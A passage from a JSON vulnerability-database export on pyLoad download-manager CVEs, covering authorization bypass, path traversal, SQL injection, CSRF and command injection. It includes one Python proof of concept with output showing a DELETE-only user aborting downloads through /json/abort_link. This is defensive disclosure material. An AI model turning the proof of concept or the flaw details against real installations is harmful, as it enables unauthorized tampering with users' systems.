('order_file', 77, 1)]\n```\n\nPoC B (DELETE-only user invokes MODIFY-only stop_downloads):\n```python\nimport os\nimport sys\nfrom types import SimpleNamespace\n\nsys.path.insert(0, os.path.abspath('src'))\n\nfrom flask import Flask\nfrom pyload.core.api import Api, Perms, Role\nfrom pyload.webui.app.blueprints import json_blueprint\n\nclass FakeApi:\n def 
__init__(self):\n self.calls = []\n\n def user_exists(self, username):\n return username == 'u'\n\n def stop_downloads(self, ids):\n self.calls.append(('stop_downloads', ids))\n\napi = Api(SimpleNamespace(_=lambda x: x))\nctx = {'role': Role.USER, 'permission': Perms.DELETE}\nprint('API auth (DELETE-only) stop_downloads:', api.is_authorized('stop_downloads', ctx))\n\napp = Flask(__name__)\napp.secret_key = 'k'\napp.config['TESTING'] = True\napp.config['WTF_CSRF_ENABLED'] = False\nf = FakeApi()\napp.config['PYLOAD_API'] = f\napp.register_blueprint(json_blueprint.bp)\n\nwith app.test_client() as c:\n with c.session_transaction() as s:\n s['authenticated'] = True\n s['name'] = 'u'\n s['role'] = int(Role.USER)\n s['perms'] = int(Perms.DELETE)\n\n r = c.post('/json/abort_link', json={'link_id': 999})\n\nprint('HTTP /json/abort_link:', r.status_code, r.get_data(as_text=True).strip())\nprint('calls:', f.calls)\n```\n\nObserved output:\n```text\nAPI auth (DELETE-only) stop_downloads: False\nHTTP /json/abort_link: 200 {\"response\":\"success\"}\ncalls: [('stop_downloads', [999])]\n```\n\n### Impact\nType:\n- Improper authorization / permission-bypass between WebUI and core API permission model.\n\nScope:\n- Horizontal privilege escalation among authenticated non-admin users.\n- Not admin takeover, but unauthorized execution of operations explicitly categorized as `MODIFY`.\n\nSecurity impact:\n- Integrity impact: unauthorized queue/file reordering by users lacking `MODIFY`.\n- Availability impact: unauthorized abort of active downloads by users lacking `MODIFY`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40071", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.12274", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40071" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", 
"reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:09:08Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40071", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40071" }, { "reference_url": "https://github.com/advisories/GHSA-rfgh-63mg-8pwm", "reference_id": "GHSA-rfgh-63mg-8pwm", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-rfgh-63mg-8pwm" } ], "fixed_packages": [], "aliases": [ "CVE-2026-40071", "GHSA-rfgh-63mg-8pwm" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hzu2-r32u-q7c7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37329?format=api", "vulnerability_id": "VCID-jxej-fugb-3ydh", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. 
The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42314", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18687", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42314" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:33:35Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42314", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42314" }, { "reference_url": "https://github.com/advisories/GHSA-97r3-5w84-r4q8", "reference_id": "GHSA-97r3-5w84-r4q8", "reference_type": "", "scores": [], 
"url": "https://github.com/advisories/GHSA-97r3-5w84-r4q8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-42314", "GHSA-97r3-5w84-r4q8", "PYSEC-2026-128" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jxej-fugb-3ydh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57825?format=api", "vulnerability_id": "VCID-mbkb-u95k-yfgc", "summary": "PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter\nThe parameter `add_links` in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55156", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18553", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55156" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { 
"value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/" } ], "url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271" }, { "reference_url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/" } ], "url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55156", "reference_id": "CVE-2025-55156", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55156" }, { "reference_url": "https://github.com/advisories/GHSA-pwh4-6r3m-j2rf", "reference_id": "GHSA-pwh4-6r3m-j2rf", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-pwh4-6r3m-j2rf" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf", "reference_id": "GHSA-pwh4-6r3m-j2rf", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", 
"scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48575?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev91", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev91" } ], "aliases": [ "CVE-2025-55156", "GHSA-pwh4-6r3m-j2rf" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mbkb-u95k-yfgc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36684?format=api", "vulnerability_id": "VCID-nbnk-6g72-3ybk", "summary": "pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. 
Since the session cookie is not set to `SameSite: strict`, this opens the application up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result, any API call can be made via a CSRF attack on behalf of an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-22416", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.05898", "scoring_system": "epss", "scoring_elements": "0.90778", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-22416" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/" } ], "url": "https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e" }, { "reference_url": "https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/" } ], "url": "https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22416", "reference_id": "CVE-2024-22416", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22416" }, { "reference_url": "https://github.com/advisories/GHSA-pgpj-v85q-h5fm", "reference_id": "GHSA-pgpj-v85q-h5fm", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pgpj-v85q-h5fm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38751?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev78", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, 
{ "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev78" } ], "aliases": [ "CVE-2024-22416", "GHSA-pgpj-v85q-h5fm", "PYSEC-2024-17" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nbnk-6g72-3ybk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37277?format=api", "vulnerability_id": "VCID-ng6u-saxg-dbf9", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the _safe_extractall() function in src/pyload/plugins/extractors/UnTar.py uses os.path.commonprefix() for its path traversal check, which performs character-level string comparison rather than path-level comparison. 
This allows a specially crafted tar archive to write files outside the intended extraction directory. The correct function os.path.commonpath() was added to the codebase in the CVE-2026-32808 fix (commit 5f4f0fa) but was never applied to _safe_extractall(), making this an incomplete fix. This vulnerability is fixed in 0.5.0b3.dev97.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35592", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18392", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35592" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-mvwx-582f-56r7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:58:13Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-mvwx-582f-56r7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35592", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", 
"scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35592" }, { "reference_url": "https://github.com/advisories/GHSA-mvwx-582f-56r7", "reference_id": "GHSA-mvwx-582f-56r7", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-mvwx-582f-56r7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48581?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev97", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97" } ], "aliases": [ "CVE-2026-35592", "GHSA-mvwx-582f-56r7", "PYSEC-2026-124" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ng6u-saxg-dbf9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37330?format=api", "vulnerability_id": "VCID-p22h-1rtx-bkcy", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, when passing a folder name in the set_package_data() API function call inside the data object with key \"_folder\", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package. 
This vulnerability is fixed in 0.5.0b3.dev100.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42315", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.19111", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42315" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42315", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42315" }, { "reference_url": "https://github.com/advisories/GHSA-838g-gr43-qqg9", "reference_id": "GHSA-838g-gr43-qqg9", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-838g-gr43-qqg9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": 
"pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-42315", "GHSA-838g-gr43-qqg9", "PYSEC-2026-129" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p22h-1rtx-bkcy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46795?format=api", "vulnerability_id": "VCID-pgh8-2pmw-7ba7", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in pyload-ng.", "references": [ { "reference_url": "http://pyload.com", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-05-09T23:56:34Z/" } ], "url": "http://pyload.com" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-47890", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00343", "scoring_system": "epss", "scoring_elements": "0.57259", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-47890" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": 
